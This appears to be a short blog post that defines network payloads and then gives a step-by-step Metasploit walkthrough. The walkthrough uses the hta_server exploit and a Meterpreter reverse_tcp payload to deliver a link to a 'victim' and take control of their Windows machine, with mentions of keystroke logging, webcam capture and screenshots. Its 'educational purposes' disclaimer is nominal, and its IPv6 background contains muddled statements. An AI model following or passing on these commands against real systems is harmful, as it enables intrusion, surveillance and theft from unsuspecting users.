Payloads

Anany sharma
5 min readJun 27, 2021

--

Data is sent in terms of packets and individual packets contain a header and the data which is sent by the sender this data is called Payload. Headers are appended to the payload for transport and then discarded when they successfully reach their destination. The main source of transfer Virus is Payload

Generally, a payload is the carrying capacity of an aircraft or launch vehicle, usually measured in terms of weight. … For a rocket, the payload can be a satellite, space probe, or spacecraft carrying humans, animals, or cargo. but in computing payload is the carrying capacity of a data packet or other transmission data unit.

Credit-Michael Geiger

Payload length

1-The Payload Length column shows the length of the data payload in 1Pv6.

2- The 16-bits size of this field limits its maximum value to 65,535 (64KB), which applies to the payload length.

3-The Payload Length field is the length of the IPv6 in the above diagram not including the length of the header Hop limit but these fields are in the Payload Length field.

Creating payload for Windows as an example

Well, I use the Metasploit framework console in the Kali Linux machine —

So let's begin but note it down this is only for educational purposes, if anyone uses it for wrong purposes WIZARDING CODES is not responsible for this……

First, open a terminal in your kali Linux machine — -

Open Terminal

2 Type “ifconfig” in the terminal and hit enter.

3- Copy your IP address from there.

4- Type “msfconsole” in the terminal and hit enter.

5- Then type this command “use exploit/windows/misc/hta_server”

WIZARDING CODES

6- Time to set your srvhost so type “set srvhost” and paste your IP address which you copied in the clipboard in the first step and hit enter.

7- Set your LHOST means your localhost, type “set lhost” and again paste your IP address which you copied in the clipboard in the first step, and hit enter.

8- Time to set your payload, type “set payload windows/meterpreter/reverse_tcp” and hit enter.

9- Then set the port number ,type “set lport 8111”.

10- After this, type “exploit” or“ run ”.

11- Now you have a link that you sent to the victim.

12- If the user downloads a payload from your link you received the following message……

13- Then check the active sessions, type sessions on the terminal.

14- Then you have all the active sessions as you see I have full control over the victim's computer.

15- Open the session, “type sessions -i 1 ”( 1 is the name of session)

16- Type “help” and they show commands through which you exploit victim’s system..

17- For example, I want to know about the victim’s system, so I type“ sysinfo” and I have all the information , as you can see …..

There are many commands like this you can take a webcam snip, you are able to observe the keystrokes you also take screenshots, etc …..

For your convenience, I upload a video of this where I perform live h@ck on my windows, if you want to see the video click on the link……

https://www.instagram.com/tv/CPGFuVyHUFD/?utm_source=ig_web_copy_link

Quotes

“Quantum Encryption is essential to protect our digital assets and infrastructure from attackers.”
Kevin Coleman

“If you think you know-it-all about cybersecurity, this discipline was probably ill-explained to you.”
Stephane Nappo

Cyber Security is the most important aspect of our Digital infrastructure. It is the next dimension of National Security. We know about Guerrilla Warfare. It is the evolved form of Guerrilla Warfare. There is no need of physical appearance in cyber warfare.”
- Nitin Pandey

So beware😈😈😈😈😈👹👹 from cyber attacks and follow or share our page WIZARDING CODES for the latest updates Thank you for visit — — — — Anany sharma (WIZARDING CODES)

--

--

Anany sharma
Anany sharma

Written by Anany sharma

Security used to be an inconvenience sometimes, but now it’s a necessity all the time. — Martina Navratilova.

No responses yet